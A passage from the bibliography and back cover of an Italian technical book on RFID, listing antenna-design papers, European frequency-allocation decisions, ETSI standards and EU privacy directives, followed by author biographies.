Human subjects”, IEEE Transaction on. Antennas andPropagation, 55, 6, June 2007, pp. 1862-1870.

[83] G.Marrocco and C. Calabrese, “Automatic design of miniaturizedslot-line RFID antennas”, 2th European Conference on Antennasand Propagation (EUCAP), Edimburg (Scotland), November2007.

[84] D.S. Weile and E. Michielsen, "Genetic algorithm optimizationapplied to electromagnetics: a review", IEEE Transaction onAntennas and Propagation, 45, 3, March 1997, pp.343-353.

[85] G. Marrocco, "Gain-optimized self-resonant meander line anten-nas for RFID applications", IEEE Antennas and WirelessPropagation Letters, 2, 2003, pp.302-305.

[86] N. Michishita and Y. Yamada, “A Novel Impedance MatchingStructure for a Dielectric Loaded 0.05 Wavelength Small MeanderLine Antenna”, IEEE Antennas and Propagation Society,International Symposium, Albuquerque, NM, July 2006, pp. 1347-1350.

[87] W. Choi, H. W. Son, C. Shin, J.-H. Bae and G. Choi, “RFID tagantenna with a meandered dipole and inductively coupled feed”,IEEE Antennas and Propagation Society, InternationalSymposium, Albuquerque, NM, July 2006, pp. 619-622.

[88] A. Toccafondi and P.Braconi, “Compact load-bars meander lineantenna for UHF RFID transponder”, European Conference onAntennas and Propagation, Nice (France), November 2006, p. 804,

[89] S. A. Delichatsios, D. W. Engels, L. Ukkonen and L. Sydänheimo,“Albano multidimensional UHF passive RFID tag antennadesigns”, Int. J. Radio Frequency Identification Technology andApplications, 1, 1, January 2006, pp. 24-40.

[90] C. Cho, H. Choo and I. Park, “Design of Novel RFID TagAntennas for Metallic Objects”, IEEE Antennas and PropagationSociety International Symposium, Albuquerque, NM, July 2006,pp. 3245-3248.

[91] M. Keskilammi and M. Kivikoski, “Using Text as a Meander Linefor RFID Transponder Antennas”, IEEE Antennas and Wireless

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 451

Page 436: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Propagation Letters, 3, 2004, pp. 372-374.[92] Y. Tikhov, Y. Kim and Y.-H. Min, “Compact Low Cost Antenna for

Passive RFID Transponder”, IEEE Antennas and PropagationSociety, International Symposium, Albuqueque (NM), July 2006,pp. 1015-1018.

[93] C. Soras, M. Karaboikis, G. Tsachtsiris and V Makios, “Analysisand design of an inverted-F antenna printed on a PCMCIA cardfor the 2.4 GHz ISM band”, IEEE Antennas and PropagationMagazine, 44, 1, February 2002, pp.37-44.

[94] H. Hirvonenen, P. Pursula, K. Jaakkola and K. Laukkanen, “Planarinverted-F antenna for radio frequency identification”, ElectronicsLetters, 40, 14, July 2004, pp.848-850.

[95] B. Yu, S.-J. Kim, B. Jung, F. J. Harackiewicz, M.-J. Park and B. Lee,“Balanced RFID Tag Antenna Mountable on Metallic Plates”,2006 IEEE Antennas and Propagation Society, InternationalSymposium, Albuquerque, NM, July 2006 pp. 3237-3240.

[96] C. H. Cheng and R. D. Murch, “Asymmetric RFID Tag Antenna”,2006 IEEE Antennas and Propagation Society, InternationalSymposium, Albuquerque, NM, July 2006, pp.1363-1366.

[97] I.Y. Chen, C.U. Huang, H.H.J. Chen, C.F. Jou and S.R.S. Huang,“Folded dual-band (2.4/5.2 GHz) antenna fabricated on siliconsuspended parylene membrane”, Asia Pacific MicrowaveConference Proceedings December 2005, 4, pp.4-8, 2005.

[98] X. H. Wu and Z. N. Chen , “Comparison of planar dipoles inUWB applications”, IEEE Transaction on Antennas andPropagation, 53, 6, June 2005, pp. 1973- 1983.

[99] C. Diugwu, J.C. Batchelor, “Analysis of the surface distribution ina dual band planar antenna for passive RFID tag”, IEEE Antennasand Propagation Society, International Symposium, Washington,NY, July 2005, pp.459-462.

[100] S. Tedjini, T. Voung, and V. Beroulle, “Antennas for RFID tags”,Joint sOc-EUSAI conference, Grenoble, France, 2005, pp.19-22.

[101] S. Jeon, Y. Yu, S. Kahng, J. Park, N. Kim and J. Choi, “Dual-bandDipole Antenna for ISO 18000-6/ISO 18000-4 Passive RFID Tag

RFID - Fondamenti di una tecnologia silenziosamente pervasiva452

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 452

Page 437: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Applications”, IEEE Antennas and Propagation Society,International Symposium, Albuqueque (NM), July 2006, pp.4285-4288.

[102] L. Mattioni and G. Marrocco, "BLADE: A Broadband LoadedAntennas DEsigner", IEEE Antennas Propagat.Magazine, 48, 5,October 2006, pp.120 - 129.

[103] S. Nambi and S. M. Wenthworth, “5.8 GHz dual-polarized apertu-re-coupled Microstrip antenna”, IEEE Antennas and PropagationSociety, International Symposium, Washington, NY, July 2005,pp.235-238.

[104] M. Stupf, R. Mittra, J. Yeo and J.R. Mosig, “Some novel design forRFID antennas and their performance enhancement with metama-terials”, IEEE Antennas and Propagation Society, InternationalSymposium, Albuqueque, NM, July 2006, pp.1023-1026.

[105] P. V. Nikitin, K.V. Rao and S. Lazar, “An overview of Near FieldUHF RFID”, IEEE Int. Conf. on RFID, March 2007, pp. 167-173.

[106] A. Taflove, Computational electromagnetics: The Finite differencemethod, Artech House, Norwood, MA, 1995

[107] P. Nikitin and K.V.S. Rao, “Theory and measurement of backscat-tering from RFID tags”, IEEE Antennas and Propagation.Magazine., 48, 6, Dec. 2006, pp.212-218.

[108] L. Ukkonen, L. Sydänheimo and M. Kivikoski “Effects of MetallicPlate Size on the Performance of Microstrip Patch-Type TagAntennas for Passive RFID”, IEEE Antennas WirelessPropagation. Letters., 4, 2005, pp.410-413.

[109] G. Marrocco, “The art of UHF RFID antenna design: impedancematching and size-reduction techniques”, IEEE Antennas andPropagat. Magaz., N.1, 2008.

[110] K.V.S. Rao, Dah-Weih Duan, Harley Heinrich, ‘On the read zoneanalysis of radio frequency identification systems with transpon-ders oriented in arbitrary directions’, IEEEMicrowave Asia PacificConference, Vol.3, pp.758-761, 1999.

[111] D. Kim, M.A. Ingram, W.W. Smith, ‘Measurements of small-scalefading and path loss for long range RF tags’, IEEE Trans. Antennas

PARTE IX - APPENDICI & BIBLIOGRAFIA453

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 453

Page 438: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Propagat., Vol. 51, No. 8, pp. 1740-1749, August 2003.[112] O. P. Gandhi, “Electromagnetic fields: human safety issues”,

Annu. Rev. Biomed. Eng.,Vol.4, pp.211-234, 2002[113] P. Nikitin, K.V.S. Rao, “Performance limitations of the passive

UHF RFID systems”, IEEE Antenna and Propagation Int. Symp,pp. 1011-1014, 2005.

[114] J.M. Lee, N.S. Kim, C.S. Pyo, “A Circular Polarized Metallic PatchAntenna for RFID Reader”, Asia-Pacific Conference onCommunications, pag. 116-118, 3-5 October 2005.

[115] R. F. Kouyoumjian, and P.H. Pathak, “ A uniform theory of diffrac-tion for an edge in a perfectly conducting surface”, Proc. IEEE,vol. 62, pp. 1448-1461, November 1974.

[116] E. Di Giampaolo, “CEST : a Complex Environment SimulationTool”, in Proc. 23rd Annu. Rev. Progress in AppliedComputational Electromagnetics, ACES 2007, pp. 1090-1094.

[117] E. Di Giampaolo, and F. Bardati, “A projective approach to elec-tromagnetic propagation in complex environments”, submitted forpubblication.

[118] R. Garg, P. Bhartia, I. Bahl, A. Ittipiboon, “Microstrip antennadesign handbook”, Artech House, New York 2001.

[119] “European Council Recommendation 1999/519/EC of 12 July1999 on the limitation of exposure of the general public to electro-magnetic fields (0 Hz to 300 GHz”, Official Journal, L199,30.7.1999., p.59) also available online athttp://ec.europa.eu/enterprise/electr_equipment/lv/rec519.pdf.

RIFERIMENTI PER ALLOCAZIONE IN FREQUENZA

5.2.1 Riferimenti generali

[120] ITU RR, 1998, Radio Regulations, vol.1.[121] Ministero delle Comunicazioni – PNRF: Piano Nazionale di

Ripartizione delle Frequenze (DM 08 Luglio 2002) -http://www.comunicazioni.it/it/index.php-IdPag=349.

[122] CEPT - European Conference of Postal and Telecommunications

RFID - Fondamenti di una tecnologia silenziosamente pervasiva454

IX.5.2

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 454

Page 439: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Administrations - (organo preposto alla direzione di 46 Paesi euro-pei in materia di Comunicazioni Postali e Radio) - Homepage:http://www.cept.org/.

[123] ERC - European Radiocommunications Committee - commissionepermanente del CEPT

[124] ETSI - European Telecommunication Standards Institute -Homepage: http://www.etsi.org/.

[125] FCC - Federal Communications Commission- attraverso il suoorgano OET - l’Office of Engineering and Technology - definiscenegli Stati Uniti, insieme al NTIA [61] l’attribuzione delle frequen-ze dello spettro elettromagnetico - :http://www.fcc.gov/oet/spectrum/.

[126] NTIA - National Telecommunications and InformationAdministration - agenzia del Department of Commerce - definiscenegli Stati Uniti, insieme all’FCC [60] l’attribuzione delle frequen-ze dello spettro elettromagnetico -http://www.ntia.doc.gov/osmhome/allochrt.html.

[127] ERO - European Radiocommunications Office - organo dellaCEPT - Raccomandazione ERC/REC 70-03 Relating To The UseOf Short Range Devices (SRD):http://www.ero.dk/documentation/docs/doc98/official/pdf/REC7003E.PDF.

[128] FCC part 15 - Radio Frequency Devices.

5.2.2 Decisioni ERC

[129] ERC/DEC(01)13SRD for Inductive applications in 9-59.750 kHz, 59.750 – 60.250kHz, 60.250-70 kHz, 70-119 kHz and 119-135 kHz

[130] ERC/DEC(01)14SRD for Inductive applications in 6765-6795 kHz, 13.553-13.567MHz

[131] ERC/DEC(01)15SRD for Inductive applications in 7400-8800 kHz

[132] ERC/DEC(01)16

PARTE IX - APPENDICI & BIBLIOGRAFIA455

403-460.qxp:rfid 9-09-2008 16:24 Pagina 455

Page 440: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

SRD for Inductive applications in 26.957-27.283 MHz[133] ERC/DEC(92)02

Cancellata da ERC/DEC(02)02[134] ERC/DEC(99)23

Sostituita da ERC/DEC(04)08[135] ERC/DEC(01)01

Non-specific SRD in 6765-6795 kHz and 13.552-13.567 MHz[136] ERC/DEC(01)02

Non-specific SRD in 26.957-27.283 MHz[137] ERC/DEC(01)03

Non-specific SRD in 40.660-40.700 MHz[138] ERC/DEC(01)04

Non-specific SRD in 868.0-868.6 MHz, 868.7-869.2 MHz, 869.4-869.65 MHz, 869.7-870.0 MHz -

[139] ERC/DEC(01)05Non-specific SRD in 2400-2483.5 MHz

[140] ERC/DEC(01)06Non-specific SRD in 5725-5875 MHz

[141] ERC/DEC(02)01Frequency bands for Road Transport and Traffic TelematicSystems RTTS)

[142] 5.795-5.805 GHz (with possible extension to 5.815 GHz), 63-64GHz and 76-77 GHz

[143] ERC/DEC(02)02Cancella la ERC/DEC(92)02 e rimanda alla ERC/DEC(02)01

[144] ECC/DEC/(04)02Non-specific SRD in the band 433.05-434.79 MHz

[145] ECC/DEC/(04)085 GHz frequency bands for the implementation of Wireless AccessSystems including Radio Local Area Networks (WAS/RLANs)(WiFi, IEEE 802.11g)

[146] ERC/DEC(06)04on the harmonised conditions for devices using Ultra-Wideband(UWB) technology in bands below 10.6 GHz

RFID - Fondamenti di una tecnologia silenziosamente pervasiva456

403-460.qxp:rfid 9-09-2008 16:31 Pagina 456

Page 441: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

5.2.3 Decisioni della Commissione Europea per riordino frequenze

e recepimento italiano

[147] 2006/804/CE Decisione della Commissione Europea “relativaall’armonizzazione dello spettro radio per le apparecchiature diidentificazione a radiofrequenza (RFID) che operano nella bandaUHF (Ultra-High Frequency)”, 25-11-2006.

[148] 2006/771/CE Decisione della Commissione Europea “relativaall’armonizzazione dello spettro radio per l'utilizzo da parte diapparecchiature a corto raggio”, 11-11-2006

[149] Gazzetta Ufficiale N. 178 del 2 Agosto 2007 – Ministero DelleComunicazioni – Decreto 12 Luglio 2007 – Modifica al vigentepiano nazionale di ripartizione delle frequenze (RecepimentoDecisioni 2006/804/CE e 2006/771/CE)

5.2.4 Standard ETSI

[150] EN 300 330 - prima vers. 1999 - Electromagnetic compatibility andRadio spectrumMatters (ERM); Short Range Devices (SRD);Radioequipment in the frequency range 9 kHz to 25 MHz and inductiveloop systems in the frequency range 9 kHz to 30 MHz - Part 1:Technical characteristics and test methods.

[151] EN 300 330 - prima vers. 1999 - Electromagnetic compatibility andRadio spectrum Matters (ERM); Short Range Devices (SRD);Radio equipment in the frequency range 9 kHz to 25 MHz andinductive loop systems in the frequency range 9 kHz to 30 MHz -Part 2: Harmonized EN under article 3.2 of the R&TTE Directive.

[152] EN 300 220 - prima vers. 1997 - Electromagnetic compatibility andRadio spectrumMatters (ERM);Short Range Devices (SRD); Radioequipment to be used in the 25 MHz to 1 000 MHz frequencyrange with power levels ranging up to 500 mW - Part 1: Technicalcharacteristics and test methods.

[153] EN 300 220 - prima vers. 1997 - Electromagnetic compatibility andRadio spectrum Matters (ERM); Short Range Devices (SRD);Radio equipment to be used in the 25 MHz to 1 000 MHz fre-quency range with power levels ranging up to 500 mW - Part 2:

PARTE IX - APPENDICI & BIBLIOGRAFIA457

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 457

Page 442: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Harmonized EN covering essential requirements under article 3.2of the R&TTE Directive.

[154] EN 302 208 - Electromagnetic compatibility and Radio spectrumMatters (ERM);Radio Frequency Identification Equipment opera-ting in the band 865 MHz to 868 MHz with power levels up to 2W - Part 1: Technical requirements and methods of measurement.

[155] EN 302 208 - Electromagnetic compatibility and Radio spectrumMatters (ERM);Radio Frequency Identification Equipment opera-ting in the band 865 MHz to 868 MHz with power levels up to 2W - Part 2: Harmonized EN under article 3.2 of the R&TTEDirective.

[156] EN 300 440 - Electromagnetic compatibility and Radio spectrumMatters (ERM);Short Range Devices (SRD);Radio equipment to beused in the 1 GHz to 40 GHz frequency range - Part 1: Technicalcharacteristics and test methods.

[157] EN 300 440 - Electromagnetic compatibility and Radio spectrumMatters (ERM); Short range devices;Radio equipment to be used inthe 1 GHz to 40 GHz frequency range - Part 2: Harmonized ENunder article 3.2 of the R&TTE Directive.

5.2.5 Riferimenti per UWB (FCC, ITU-r, CEPT, escluso Dec ERC)

[158] FCC Part 15 - Radio Frequency Devices; Subpart F - Ultra-Wideband Operation (14/2/2002).

[159] FCC Part 15 - Radio Frequency Devices; Subpart C - IntentionalRadiators; Part 15.250 - Operation of wideband systems within theband 5,925-7,250 GHz.

[160] ITU-R - Questions 226/1, 227/1 - Draft Recommendation onCharacteristics of ultra-wideband technology.

[161] ITU-R - Question 226/1 - Draft Recommendation on Frameworkfor the introduction of devices using ultra-wideband technology.

[162] ITU-R - Question 227/1 - Draft Recommendation on Impact ofdevices using ultra-wideband technology on systems operatingwithin radiocommunication services.

[163] ITU-R - Question 227/1 - Draft Recommendation on

RFID - Fondamenti di una tecnologia silenziosamente pervasiva458

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 458

Page 443: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Measurement techniques of ultra-wideband transmissions.[164] ECC/CEPT - Report 64 (Feb. 2005) - The Protection

Requirements of Radiocommunications Systems below 10.6 GHzfrom generic UWB applications.

5.2.6 Raccomandazione e Direttive europee su Privacy e Conformità

[165] European Commission Recommendation on the implementationof privacy, data protection and information security principles inapplications supported by radio-frequency identification – “RFIDPrivacy, Data Protection and Security Recommendation”,February 2008

[166] Direttiva 95/46/EC del Parlamento europeo e del Consiglio relati-va alla tutela delle persone fisiche con riguardo al trattamento deidati personali, nonché alla libera circolazione di tali dati, 24 otto-bre 1995

[167] Direttiva 2002/58/CE del Parlamento europeo e del Consiglio rela-tiva al trattamento dei dati personali e alla tutela della vita privatanel settore delle comunicazioni elettroniche (direttiva relativa allavita privata e alle comunicazioni elettroniche), 12 luglio 2002

[168] Direttiva 1999/5/EC del Parlamento europeo e del Consiglioriguardante le apparecchiature radio e le apparecchiature termina-li di telecomunicazione e il reciproco riconoscimento della loroconformità (R&TTE), 9 Marzo 1999

[169] Peter Harrop, IDTechEx, “RFID Forecasts, Players,Opportunities”, presentazione al convegno TraceID, Milano,Aprile, 2008

PARTE IX - APPENDICI & BIBLIOGRAFIA459

403-460.qxp:rfid 9-09-2008 12:41 Pagina 459

Page 444: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFIdFondamenti di una tecnologia silenziosamente pervasiva

di Paolo Talone, Giuseppe Russo

Pubblicazione della Fondazione Ugo Bordoniin collaborazione con Assoknowledge e Gruppo TIA

Con il patrocinio di

RFId

Gli autori

Paolo Talone

[email protected]

Laureato in IngegneriaElettronica, svolge da oltre 25anni attività presso laFondazione Bordoni di Romacome responsabile di progettidi ricerca e membro dicommissioni internazionali dinormativa (ITU-T, MPEG).

Negli anni progetti e attività di ricerca hannoriguardato i servizi multimediali (teledidattica,telemedicina), le codifiche video in MPEG 4 eTelemedicina, la televisione e la radio digitali, isistemi di videocomunicazione, le tecnologieRFId.Attualmente coordina attività sulla Qualità delServizio e l’Ingegneria dei sistemi ICT.È autore di pubblicazioni scientifiche e tecniche.

Giuseppe Russo

[email protected]

Laureato in IngegneriaElettronica presso l’Universitàdi Roma “Sapienza” nel 1988.Ricercatore in FondazioneBordoni dal 1989, su temiriguardanti le architetture ele codifiche video di sistemiavanzati di videocomunica-

zione interpersonale e diffusiva.Attivo in comitati di standardizzazione ITU-T edISO (JPEG, MPEG).Attualmente nell’area “Qualità del Servizio eIngegneria dei sistemi ICT” si occupa di proble-matiche di Q.o.S. nelle nuove piattaformeaudiovisive.Autore di pubblicazioni scientifiche e tecniche.

I coautori

Gran parte del rinnovo della seconda edizione èfrutto del lavoro dei numerosi coautori.A tutti va il doveroso e sentito ringraziamento,l’augurio che il loro contributo prosegua e lasperanza che sempre nuove collaborazionipossano fare di questo volume un riferimentoanche negli anni a venire.Si ricordano brevemente i coautori, in ordinetemporale delle loro collaborazioni.

– Ubaldo Montanari, con una documentazioneindustriale completa ed aggiornata, haconsentito di tenere l’opera agganciata allarealtà produttiva.

– Franco Musiari e Ubaldo Montanari hannocontribuito a fare della Parte I un’agevoleintroduzione anche per i non addetti ai lavori.

– Luca Carettoni e Stefano Zanero, esperti insicurezza informatica, hanno completato eampliato la Parte VIII sulla sicurezza e privacy,tema ineludibile per un corretto sviluppodella tecnologia RFID.

– Stefano Baroni, progettista di antenne peruna primaria azienda nazionale ha trattato iproblemi industriali delle antenne dei TAGed, in particolare, le antenne a filo.

– Graziano Azzalin e Marcello Barboni,ricercatori in una primaria strutturadell’Unione Europea, hanno curato la sezionesui sigilli elettronici nella Parte VIII.

– Marzio Amadori direttore tecnico di un’altraprimaria azienda nazionale ha curato icapitoli sulle tecniche di produzione dei TAGnella Parte II, nonché l’analisi dei costiindustriali nella Parte I.

– Gaetano Marrocco ed Emidio Di Giampaolodocenti all’Università di Roma 2, hannoredatto gran parte della Parte III dedicata allepiù recenti tecnologie d’antenna per TAG adalta frequenza, ai relativi principi diprogettazione, nonché ai parametri e aimodelli per la copertura di ambienti consistemi RFID.

copertinacorretta:Layout 1 16-09-2008 12:10 Pagina 1

Page 445: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFIdFondamenti di una tecnologia silenziosamente pervasiva

di Paolo Talone, Giuseppe Russo

Pubblicazione della Fondazione Ugo Bordoniin collaborazione con Assoknowledge e Gruppo TIA

Con il patrocinio di

RFId

Gli autori

Paolo Talone

[email protected]

Laureato in IngegneriaElettronica, svolge da oltre 25anni attività presso laFondazione Bordoni di Romacome responsabile di progettidi ricerca e membro dicommissioni internazionali dinormativa (ITU-T, MPEG).

Negli anni progetti e attività di ricerca hannoriguardato i servizi multimediali (teledidattica,telemedicina), le codifiche video in MPEG 4 eTelemedicina, la televisione e la radio digitali, isistemi di videocomunicazione, le tecnologieRFId.Attualmente coordina attività sulla Qualità delServizio e l’Ingegneria dei sistemi ICT.È autore di pubblicazioni scientifiche e tecniche.

Giuseppe Russo

[email protected]

Laureato in IngegneriaElettronica presso l’Universitàdi Roma “Sapienza” nel 1988.Ricercatore in FondazioneBordoni dal 1989, su temiriguardanti le architetture ele codifiche video di sistemiavanzati di videocomunica-

zione interpersonale e diffusiva.Attivo in comitati di standardizzazione ITU-T edISO (JPEG, MPEG).Attualmente nell’area “Qualità del Servizio eIngegneria dei sistemi ICT” si occupa di proble-matiche di Q.o.S. nelle nuove piattaformeaudiovisive.Autore di pubblicazioni scientifiche e tecniche.

I coautori

Gran parte del rinnovo della seconda edizione èfrutto del lavoro dei numerosi coautori.A tutti va il doveroso e sentito ringraziamento,l’augurio che il loro contributo prosegua e lasperanza che sempre nuove collaborazionipossano fare di questo volume un riferimentoanche negli anni a venire.Si ricordano brevemente i coautori, in ordinetemporale delle loro collaborazioni.

– Ubaldo Montanari, con una documentazioneindustriale completa ed aggiornata, haconsentito di tenere l’opera agganciata allarealtà produttiva.

– Franco Musiari e Ubaldo Montanari hannocontribuito a fare della Parte I un’agevoleintroduzione anche per i non addetti ai lavori.

– Luca Carettoni e Stefano Zanero, esperti insicurezza informatica, hanno completato eampliato la Parte VIII sulla sicurezza e privacy,tema ineludibile per un corretto sviluppodella tecnologia RFID.

– Stefano Baroni, progettista di antenne peruna primaria azienda nazionale ha trattato iproblemi industriali delle antenne dei TAGed, in particolare, le antenne a filo.

– Graziano Azzalin e Marcello Barboni,ricercatori in una primaria strutturadell’Unione Europea, hanno curato la sezionesui sigilli elettronici nella Parte VIII.

– Marzio Amadori direttore tecnico di un’altraprimaria azienda nazionale ha curato icapitoli sulle tecniche di produzione dei TAGnella Parte II, nonché l’analisi dei costiindustriali nella Parte I.

– Gaetano Marrocco ed Emidio Di Giampaolodocenti all’Università di Roma 2, hannoredatto gran parte della Parte III dedicata allepiù recenti tecnologie d’antenna per TAG adalta frequenza, ai relativi principi diprogettazione, nonché ai parametri e aimodelli per la copertura di ambienti consistemi RFID.

copertinacorretta:Layout 1 16-09-2008 12:10 Pagina 1